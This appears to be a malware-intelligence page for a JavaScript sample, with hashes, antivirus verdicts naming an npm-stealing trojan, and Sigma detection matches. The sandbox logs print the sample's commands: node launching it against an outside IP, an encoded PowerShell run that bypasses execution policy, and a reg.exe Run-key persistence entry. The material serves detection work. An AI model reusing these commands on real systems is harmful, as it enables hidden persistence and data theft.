a84412efcc457c5666f23b3d44cae281
Hash
- MD5: a84412efcc457c5666f23b3d44cae281
- SHA1: ae81b945ae8fe52211c399ffdafd45c77d8c1fab
- SHA256: cdec8b20338beb708b5be8d3d7a3041a35a8b0fb92f9186262f312d55ff82066
- First Seen: 2026-06-20
- Last Seen: 2026-06-20
-
1
Related Reports
-
0
Related IOCs
Additional Information
VirusTotal
{
"data": {
"id": "cdec8b20338beb708b5be8d3d7a3041a35a8b0fb92f9186262f312d55ff82066",
"type": "file",
"links": {
"self": "https://www.virustotal.com/api/v3/files/cdec8b20338beb708b5be8d3d7a3041a35a8b0fb92f9186262f312d55ff82066"
},
"attributes": {
"sha1": "ae81b945ae8fe52211c399ffdafd45c77d8c1fab",
"sigma_analysis_summary": {
"Sigma Integrated Rule Set (GitHub)": {
"critical": 0,
"high": 0,
"medium": 7,
"low": 3
}
},
"meaningful_name": "a.js",
"type_tags": [
"source",
"javascript",
"js"
],
"last_submission_date": 1780048232,
"type_tag": "javascript",
"last_analysis_date": 1781896491,
"tlsh": "T122B120185E44B404577BB7719B3A60F5FAB28B2382802907B53CA7A07FB4C28DDD1E30",
"vhash": "65a8fb30dbd5ec83a8d96a21b624b703",
"last_analysis_results": {
"Bkav": {
"method": "blacklist",
"engine_name": "Bkav",
"engine_version": "8.2.40(8338)",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"Lionic": {
"method": "blacklist",
"engine_name": "Lionic",
"engine_version": "8.16",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"MicroWorld-eScan": {
"method": "blacklist",
"engine_name": "MicroWorld-eScan",
"engine_version": "14.0.409.0",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"ClamAV": {
"method": "blacklist",
"engine_name": "ClamAV",
"engine_version": "1.5.2.0",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"CTX": {
"method": "blacklist",
"engine_name": "CTX",
"engine_version": "2024.8.29.1",
"engine_update": "20260619",
"category": "malicious",
"result": "javascript.trojan.npmsteal"
},
"CAT-QuickHeal": {
"method": "blacklist",
"engine_name": "CAT-QuickHeal",
"engine_version": "22.00",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"Skyhigh": {
"method": "blacklist",
"engine_name": "Skyhigh",
"engine_version": "v2021.2.0+4045",
"engine_update": "20260619",
"category": "malicious",
"result": "JS/NpmSteal.a"
},
"ALYac": {
"method": "blacklist",
"engine_name": "ALYac",
"engine_version": "2.0.0.10",
"engine_update": "20260619",
"category": "malicious",
"result": "Trojan.Script.Agent"
},
"Malwarebytes": {
"method": "blacklist",
"engine_name": "Malwarebytes",
"engine_version": "3.1.0.239",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"VIPRE": {
"method": "blacklist",
"engine_name": "VIPRE",
"engine_version": "6.0.0.35",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"Sangfor": {
"method": "blacklist",
"engine_name": "Sangfor",
"engine_version": "2.22.3.0",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"K7AntiVirus": {
"method": "blacklist",
"engine_name": "K7AntiVirus",
"engine_version": "14.58.59880",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"K7GW": {
"method": "blacklist",
"engine_name": "K7GW",
"engine_version": "14.58.59880",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"CrowdStrike": {
"method": "blacklist",
"engine_name": "CrowdStrike",
"engine_version": "1.0",
"engine_update": "20251219",
"category": "undetected",
"result": null
},
"Arcabit": {
"method": "blacklist",
"engine_name": "Arcabit",
"engine_version": "2025.0.0.23",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"VirIT": {
"method": "blacklist",
"engine_name": "VirIT",
"engine_version": "9.5.1232",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"ESET-NOD32": {
"method": "blacklist",
"engine_name": "ESET-NOD32",
"engine_version": "18.2.18.0",
"engine_update": "20260619",
"category": "malicious",
"result": "JS/TrojanDownloader.Agent.AEOL trojan"
},
"TrendMicro-HouseCall": {
"method": "blacklist",
"engine_name": "TrendMicro-HouseCall",
"engine_version": "24.550.0.1002",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"Avast": {
"method": "blacklist",
"engine_name": "Avast",
"engine_version": "23.9.8494.0",
"engine_update": "20260619",
"category": "malicious",
"result": "Script:SNH-gen [Drp]"
},
"Cynet": {
"method": "blacklist",
"engine_name": "Cynet",
"engine_version": "4.0.3.4",
"engine_update": "20260619",
"category": "malicious",
"result": "Malicious (score: 99)"
},
"Kaspersky": {
"method": "blacklist",
"engine_name": "Kaspersky",
"engine_version": "22.0.1.28",
"engine_update": "20260619",
"category": "malicious",
"result": "HEUR:Trojan.Script.Generic"
},
"BitDefender": {
"method": "blacklist",
"engine_name": "BitDefender",
"engine_version": "7.2",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"NANO-Antivirus": {
"method": "blacklist",
"engine_name": "NANO-Antivirus",
"engine_version": "1.0.170.26895",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"ViRobot": {
"method": "blacklist",
"engine_name": "ViRobot",
"engine_version": "2014.3.20.0",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"Tencent": {
"method": "blacklist",
"engine_name": "Tencent",
"engine_version": "1.0.0.1",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"Sophos": {
"method": "blacklist",
"engine_name": "Sophos",
"engine_version": "3.5.1.0",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"F-Secure": {
"method": "blacklist",
"engine_name": "F-Secure",
"engine_version": "18.10.1547.307",
"engine_update": "20260619",
"category": "malicious",
"result": "Dropper.DR/SNH"
},
"DrWeb": {
"method": "blacklist",
"engine_name": "DrWeb",
"engine_version": "7.0.75.2070",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"Zillya": {
"method": "blacklist",
"engine_name": "Zillya",
"engine_version": "2.0.0.5625",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"TrendMicro": {
"method": "blacklist",
"engine_name": "TrendMicro",
"engine_version": "24.550.0.1002",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"McAfeeD": {
"method": "blacklist",
"engine_name": "McAfeeD",
"engine_version": "1.2.0.15146",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"CMC": {
"method": "blacklist",
"engine_name": "CMC",
"engine_version": "2.4.2022.1",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"Emsisoft": {
"method": "blacklist",
"engine_name": "Emsisoft",
"engine_version": "2024.8.0.61147",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"Jiangmin": {
"method": "blacklist",
"engine_name": "Jiangmin",
"engine_version": "16.0.100",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"Google": {
"method": "blacklist",
"engine_name": "Google",
"engine_version": "1781888514",
"engine_update": "20260619",
"category": "malicious",
"result": "Detected"
},
"Avira": {
"method": "blacklist",
"engine_name": "Avira",
"engine_version": "8.3.3.24",
"engine_update": "20260619",
"category": "malicious",
"result": "DR/SNH"
},
"Antiy-AVL": {
"method": "blacklist",
"engine_name": "Antiy-AVL",
"engine_version": "3.0",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"Kingsoft": {
"method": "blacklist",
"engine_name": "Kingsoft",
"engine_version": "None",
"engine_update": "20260618",
"category": "undetected",
"result": null
},
"Xcitium": {
"method": "blacklist",
"engine_name": "Xcitium",
"engine_version": "38743",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"Microsoft": {
"method": "blacklist",
"engine_name": "Microsoft",
"engine_version": "1.1.26050.11",
"engine_update": "20260619",
"category": "malicious",
"result": "Trojan:Win32/Qwexlafiba!rfn"
},
"SUPERAntiSpyware": {
"method": "blacklist",
"engine_name": "SUPERAntiSpyware",
"engine_version": "5.6.0.1032",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"ZoneAlarm": {
"method": "blacklist",
"engine_name": "ZoneAlarm",
"engine_version": "6.25-116107675",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"GData": {
"method": "blacklist",
"engine_name": "GData",
"engine_version": "GD:27.44970AVA:64.31444",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"Varist": {
"method": "blacklist",
"engine_name": "Varist",
"engine_version": "6.6.1.3",
"engine_update": "20260619",
"category": "malicious",
"result": "ABTrojan.RHNN-"
},
"AhnLab-V3": {
"method": "blacklist",
"engine_name": "AhnLab-V3",
"engine_version": "3.30.1.10706",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"Acronis": {
"method": "blacklist",
"engine_name": "Acronis",
"engine_version": "1.2.0.121",
"engine_update": "20240328",
"category": "undetected",
"result": null
},
"VBA32": {
"method": "blacklist",
"engine_name": "VBA32",
"engine_version": "5.6.1",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"TACHYON": {
"method": "blacklist",
"engine_name": "TACHYON",
"engine_version": "2026-06-19.02",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"Zoner": {
"method": "blacklist",
"engine_name": "Zoner",
"engine_version": "2.2.2.0",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"Rising": {
"method": "blacklist",
"engine_name": "Rising",
"engine_version": "25.0.0.28",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"Yandex": {
"method": "blacklist",
"engine_name": "Yandex",
"engine_version": "5.5.2.24",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"TrellixENS": {
"method": "blacklist",
"engine_name": "TrellixENS",
"engine_version": "6.0.6.653",
"engine_update": "20260619",
"category": "malicious",
"result": "JS/NpmSteal.a"
},
"huorong": {
"method": "blacklist",
"engine_name": "huorong",
"engine_version": "f43e059:f43e059:1e47ea2:1e47ea2",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"MaxSecure": {
"method": "blacklist",
"engine_name": "MaxSecure",
"engine_version": "1.0.0.1",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"Fortinet": {
"method": "blacklist",
"engine_name": "Fortinet",
"engine_version": "7.0.48.0",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"AVG": {
"method": "blacklist",
"engine_name": "AVG",
"engine_version": "23.9.8494.0",
"engine_update": "20260619",
"category": "malicious",
"result": "Script:SNH-gen [Drp]"
},
"Panda": {
"method": "blacklist",
"engine_name": "Panda",
"engine_version": "4.6.4.2",
"engine_update": "20260619",
"category": "undetected",
"result": null
},
"alibabacloud": {
"method": "blacklist",
"engine_name": "alibabacloud",
"engine_version": "2.2.0",
"engine_update": "20250321",
"category": "malicious",
"result": "Trojan[dropper]:Javascript/NpmSteal.DK8PHU"
},
"Symantec": {
"method": "blacklist",
"engine_name": "Symantec",
"engine_version": "1.22.0.0",
"engine_update": "20260619",
"category": "failure",
"result": null
},
"Ikarus": {
"method": "blacklist",
"engine_name": "Ikarus",
"engine_version": "6.5.4.0",
"engine_update": "20260619",
"category": "failure",
"result": null
},
"Avast-Mobile": {
"method": "blacklist",
"engine_name": "Avast-Mobile",
"engine_version": "260618-08",
"engine_update": "20260619",
"category": "type-unsupported",
"result": null
},
"SymantecMobileInsight": {
"method": "blacklist",
"engine_name": "SymantecMobileInsight",
"engine_version": "2.0",
"engine_update": "20260123",
"category": "type-unsupported",
"result": null
},
"BitDefenderFalx": {
"method": "blacklist",
"engine_name": "BitDefenderFalx",
"engine_version": "2.0.936",
"engine_update": "20260525",
"category": "type-unsupported",
"result": null
},
"DeepInstinct": {
"method": "blacklist",
"engine_name": "DeepInstinct",
"engine_version": "5.0.0.8",
"engine_update": "20260614",
"category": "type-unsupported",
"result": null
},
"Elastic": {
"method": "blacklist",
"engine_name": "Elastic",
"engine_version": "4.0.265",
"engine_update": "20260617",
"category": "type-unsupported",
"result": null
},
"APEX": {
"method": "blacklist",
"engine_name": "APEX",
"engine_version": "6.790",
"engine_update": "20260619",
"category": "type-unsupported",
"result": null
},
"Paloalto": {
"method": "blacklist",
"engine_name": "Paloalto",
"engine_version": "0.9.0.1003",
"engine_update": "20260619",
"category": "type-unsupported",
"result": null
},
"Trapmine": {
"method": "blacklist",
"engine_name": "Trapmine",
"engine_version": "4.0.12.0",
"engine_update": "20260604",
"category": "type-unsupported",
"result": null
},
"Alibaba": {
"method": "blacklist",
"engine_name": "Alibaba",
"engine_version": "0.3.0.5",
"engine_update": "20190527",
"category": "type-unsupported",
"result": null
},
"Webroot": {
"method": "blacklist",
"engine_name": "Webroot",
"engine_version": "1.9.0.8",
"engine_update": "20250227",
"category": "type-unsupported",
"result": null
},
"Cylance": {
"method": "blacklist",
"engine_name": "Cylance",
"engine_version": "3.0.0.0",
"engine_update": "20260618",
"category": "type-unsupported",
"result": null
},
"SentinelOne": {
"method": "blacklist",
"engine_name": "SentinelOne",
"engine_version": "7.6.3.2",
"engine_update": "20260608",
"category": "type-unsupported",
"result": null
},
"tehtris": {
"method": "blacklist",
"engine_name": "tehtris",
"engine_version": "v0.1.4",
"engine_update": "20260619",
"category": "type-unsupported",
"result": null
},
"Trustlook": {
"method": "blacklist",
"engine_name": "Trustlook",
"engine_version": "1.0",
"engine_update": "20260619",
"category": "type-unsupported",
"result": null
}
},
"magika": "JAVASCRIPT",
"type_extension": "js",
"unique_sources": 1,
"ssdeep": "96:r3loW+bsT/RNIaVs0uVt9bSbLuykS8SmN+zPjMs3uRYwJ9JA0n:TiW+IT/R20I7+/uykS8SM+zPjMguRYwr",
"reputation": 0,
"tags": [
"long-sleeps",
"javascript",
"idle"
],
"times_submitted": 1,
"total_votes": {
"harmless": 0,
"malicious": 0
},
"sigma_analysis_stats": {
"critical": 0,
"high": 0,
"medium": 7,
"low": 3
},
"last_modification_date": 1781904054,
"crowdsourced_yara_results": [
{
"ruleset_id": "0122a7f913",
"ruleset_version": "0122a7f913|589bbefc22847193cac455858fa15e627d671918",
"ruleset_name": "Windows_API_Function",
"rule_name": "Windows_API_Function",
"match_date": 1781896855,
"description": "This signature detects the presence of a number of Windows API functionality often seen within embedded executables. When this signature alerts on an executable, it is not an indication of malicious behavior. However, if seen firing in other file types, deeper investigation may be warranted.",
"author": "InQuest Labs",
"source": "https://github.com/InQuest/yara-rules-vt"
}
],
"md5": "a84412efcc457c5666f23b3d44cae281",
"names": [
"a.js"
],
"size": 5414,
"sha256": "cdec8b20338beb708b5be8d3d7a3041a35a8b0fb92f9186262f312d55ff82066",
"magic": "ASCII text, with very long lines (809u), with CRLF line terminators",
"sigma_analysis_results": [
{
"rule_level": "medium",
"rule_id": "06b48fa7870d38bdf92b4d4a9b9c4a4df779bd405fdc5ba0e70911df20027ce1",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Change PowerShell Policies to an Insecure Level",
"rule_description": "Detects changing the PowerShell script execution policy to a potentially insecure level using the \"-ExecutionPolicy\" flag.",
"rule_author": "frack113",
"match_context": [
{
"values": {
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"CurrentDirectory": "C:\\Users\\Bruno\\AppData\\Local\\Temp\\",
"OriginalFileName": "PowerShell.EXE",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentCommandLine": "\"C:\\Program Files\\nodejs\\node.exe\" C:\\Users\\Bruno\\AppData\\Local\\Temp\\0d07ed592d764f2546168524.js 23.254.164.123:443",
"CommandLine": "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand \"JABhAGwAbAAgAD0AIABAACgAKQAKAAoAdAByAHkAIAB7AAoAIAAgACAAIAAkAGEAbA BsACAAKwA9ACAARwBlAHQALQBTAHQAYQByAHQAQQBwAHAAcwAgAHwAIABTAGUAbABlAGMAdAAtAE8AYg BqAGUAYwB0ACAALQBFAHgAcABhAG4AZABQAHIAbwBwAGUAcgB0AHkAIABOAGEAbQBlAAoAfQAgAGMAYQ B0AGMAaAAgAHsAfQAKAAoAdAByAHkAIAB7AAoAIAAgACAAIAAkAHAAYQB0AGgAcwAgAD0AIABAACgACg AgACAAIAAgACAAIAAnAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZg B0AFwAVwBpAG4AZABvAHcAcwBcA [TRUNCATED]",
"EventID": "1",
"ParentImage": "C:\\Program Files\\nodejs\\node.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\AppData\\Local\\Temp\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"Description": "Windows PowerShell",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"EventID": "1",
"CommandLine": "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command \"Get-Process | Select-Object -ExpandProperty ProcessName\"",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "8b5db9da5732dc549b0e8b56fe5933d7c95ed760f3ac20568ab95347ef8c5bcc",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "CurrentVersion Autorun Keys Modification",
"rule_description": "Detects modification of autostart extensibility point (ASEP) in registry.",
"rule_author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)",
"match_context": [
{
"values": {
"RuleName": "T1060,RunKey",
"EventID": "13",
"Details": "powershell -w h -c \"& 'C:\\Program Files\\nodejs\\node.exe' 'C:\\ProgramData\\NodePackages\\protocal.cjs'\"",
"Image": "C:\\Windows\\system32\\reg.exe",
"EventType": "SetValue",
"TargetObject": "HKU\\S-1-5-21-4005801669-2598574594-602355426-1001\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\NvmProtocal"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "aa87efb252a9cf7bb1fb0114336bd08c338bc9046dd498d187c209cd94ddbc6a",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Potential Persistence Attempt Via Run Keys Using Reg.EXE",
"rule_description": "Detects suspicious command line reg.exe tool adding key to RUN key in Registry",
"rule_author": "Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)",
"match_context": [
{
"values": {
"Hashes": "MD5=227F63E1D9008B36BDBCC4B397780BE4,SHA256=C0E25B1F9B22DE445298C1E96DDFCEAD265CA030FA6626F61A4A4786CC4A3B7D,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC",
"CurrentDirectory": "C:\\Users\\Bruno\\AppData\\Local\\Temp\\",
"OriginalFileName": "reg.exe",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Registry Console Tool",
"EventID": "1",
"ParentCommandLine": "\"C:\\Program Files\\nodejs\\node.exe\" C:\\Users\\Bruno\\AppData\\Local\\Temp\\0d07ed592d764f2546168524.js 23.254.164.123:443",
"CommandLine": "reg.exe add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v NvmProtocal /t REG_SZ /d \"powershell -w h -c \\\"& 'C:\\Program Files\\nodejs\\node.exe' 'C:\\ProgramData\\NodePackages\\protocal.cjs'\\\"\" /f",
"FileVersion": "10.0.19041.1 (WinBuild.160101.0800)",
"ParentImage": "C:\\Program Files\\nodejs\\node.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\reg.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "b5f76af9d8101930af8d4fee71f3a5395b47eff6bb88e581db02bf890242d79b",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Direct Autorun Keys Modification",
"rule_description": "Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe.",
"rule_author": "Victor Sergeev, Daniil Yugoslavskiy, oscd.community, Swachchhanda Shrawan Poudel (Nextron Systems)",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\AppData\\Local\\Temp\\",
"OriginalFileName": "reg.exe",
"Hashes": "MD5=227F63E1D9008B36BDBCC4B397780BE4,SHA256=C0E25B1F9B22DE445298C1E96DDFCEAD265CA030FA6626F61A4A4786CC4A3B7D,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC",
"Description": "Registry Console Tool",
"EventID": "1",
"ParentCommandLine": "\"C:\\Program Files\\nodejs\\node.exe\" C:\\Users\\Bruno\\AppData\\Local\\Temp\\0d07ed592d764f2546168524.js 23.254.164.123:443",
"CommandLine": "reg.exe add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v NvmProtocal /t REG_SZ /d \"powershell -w h -c \\\"& 'C:\\Program Files\\nodejs\\node.exe' 'C:\\ProgramData\\NodePackages\\protocal.cjs'\\\"\" /f",
"FileVersion": "10.0.19041.1 (WinBuild.160101.0800)",
"ParentImage": "C:\\Program Files\\nodejs\\node.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\reg.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "cfe58f03c01bfef6fd133a3da09440cc5613a5dbeb310ee795cc443e18538943",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious PowerShell In Registry Run Keys",
"rule_description": "Detects potential PowerShell commands or code within registry run keys",
"rule_author": "frack113, Florian Roth (Nextron Systems)",
"match_context": [
{
"values": {
"RuleName": "T1060,RunKey",
"EventType": "SetValue",
"EventID": "13",
"Image": "C:\\Windows\\system32\\reg.exe",
"Details": "powershell -w h -c \"& 'C:\\Program Files\\nodejs\\node.exe' 'C:\\ProgramData\\NodePackages\\protocal.cjs'\"",
"TargetObject": "HKU\\S-1-5-21-4005801669-2598574594-602355426-1001\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\NvmProtocal"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "dc48d8314d305b4c97b9f813958e20738bb989b83928e70ea811bb7c0bf7e197",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious PowerShell Invocations - Specific - ProcessCreation",
"rule_description": "Detects suspicious PowerShell invocation command parameters",
"rule_author": "Nasreddine Bencherchali (Nextron Systems)",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\AppData\\Local\\Temp\\",
"OriginalFileName": "reg.exe",
"Hashes": "MD5=227F63E1D9008B36BDBCC4B397780BE4,SHA256=C0E25B1F9B22DE445298C1E96DDFCEAD265CA030FA6626F61A4A4786CC4A3B7D,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC",
"Description": "Registry Console Tool",
"FileVersion": "10.0.19041.1 (WinBuild.160101.0800)",
"ParentCommandLine": "\"C:\\Program Files\\nodejs\\node.exe\" C:\\Users\\Bruno\\AppData\\Local\\Temp\\0d07ed592d764f2546168524.js 23.254.164.123:443",
"CommandLine": "reg.exe add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v NvmProtocal /t REG_SZ /d \"powershell -w h -c \\\"& 'C:\\Program Files\\nodejs\\node.exe' 'C:\\ProgramData\\NodePackages\\protocal.cjs'\\\"\" /f",
"EventID": "1",
"ParentImage": "C:\\Program Files\\nodejs\\node.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\reg.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "eb75f9de2201bfad4ef177dca85b0b8fa8e5a86ba2357af5301f72acbc5eb144",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious Execution of Powershell with Base64",
"rule_description": "Commandline to launch powershell with a base64 payload",
"rule_author": "frack113",
"match_context": [
{
"values": {
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"CurrentDirectory": "C:\\Users\\Bruno\\AppData\\Local\\Temp\\",
"OriginalFileName": "PowerShell.EXE",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentCommandLine": "\"C:\\Program Files\\nodejs\\node.exe\" C:\\Users\\Bruno\\AppData\\Local\\Temp\\0d07ed592d764f2546168524.js 23.254.164.123:443",
"CommandLine": "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand \"JABhAGwAbAAgAD0AIABAACgAKQAKAAoAdAByAHkAIAB7AAoAIAAgACAAIAAkAGEAbA BsACAAKwA9ACAARwBlAHQALQBTAHQAYQByAHQAQQBwAHAAcwAgAHwAIABTAGUAbABlAGMAdAAtAE8AYg BqAGUAYwB0ACAALQBFAHgAcABhAG4AZABQAHIAbwBwAGUAcgB0AHkAIABOAGEAbQBlAAoAfQAgAGMAYQ B0AGMAaAAgAHsAfQAKAAoAdAByAHkAIAB7AAoAIAAgACAAIAAkAHAAYQB0AGgAcwAgAD0AIABAACgACg AgACAAIAAgACAAIAAnAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZg B0AFwAVwBpAG4AZABvAHcAcwBcA [TRUNCATED]",
"EventID": "1",
"ParentImage": "C:\\Program Files\\nodejs\\node.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "low",
"rule_id": "1c2e4db94ca79f939e94e29c04fb3b71467fc6f5b9c31db34fcce5a2fb3b856f",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Non Interactive PowerShell Process Spawned",
"rule_description": "Detects non-interactive PowerShell activity by looking at the \"powershell\" process with a non-user GUI process such as \"explorer.exe\" as a parent.",
"rule_author": "Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)",
"match_context": [
{
"values": {
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"CurrentDirectory": "C:\\Users\\Bruno\\AppData\\Local\\Temp\\",
"OriginalFileName": "PowerShell.EXE",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "\"C:\\Program Files\\nodejs\\node.exe\" C:\\Users\\Bruno\\AppData\\Local\\Temp\\0d07ed592d764f2546168524.js 23.254.164.123:443",
"CommandLine": "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand \"JABhAGwAbAAgAD0AIABAACgAKQAKAAoAdAByAHkAIAB7AAoAIAAgACAAIAAkAGEAbA BsACAAKwA9ACAARwBlAHQALQBTAHQAYQByAHQAQQBwAHAAcwAgAHwAIABTAGUAbABlAGMAdAAtAE8AYg BqAGUAYwB0ACAALQBFAHgAcABhAG4AZABQAHIAbwBwAGUAcgB0AHkAIABOAGEAbQBlAAoAfQAgAGMAYQ B0AGMAaAAgAHsAfQAKAAoAdAByAHkAIAB7AAoAIAAgACAAIAAkAHAAYQB0AGgAcwAgAD0AIABAACgACg AgACAAIAAgACAAIAAnAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZg B0AFwAVwBpAG4AZABvAHcAcwBcA [TRUNCATED]",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentImage": "C:\\Program Files\\nodejs\\node.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\AppData\\Local\\Temp\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"Description": "Windows PowerShell",
"EventID": "1",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"CommandLine": "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command \"Get-Process | Select-Object -ExpandProperty ProcessName\"",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "low",
"rule_id": "b0d225f3239543a37159ba2855ee1e7972c6bff3c83ce7aed9056599f6ee6314",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious Process Discovery With Get-Process",
"rule_description": "Get the processes that are running on the local computer.",
"rule_author": "frack113",
"match_context": [
{
"values": {
"ScriptBlockText": "Get-Process | Select-Object -ExpandProperty ProcessName",
"Path": "",
"ScriptBlockId": "4a699416-4dc6-4cf2-a450-ed73b5aa1879",
"MessageTotal": "1",
"EventID": "4104",
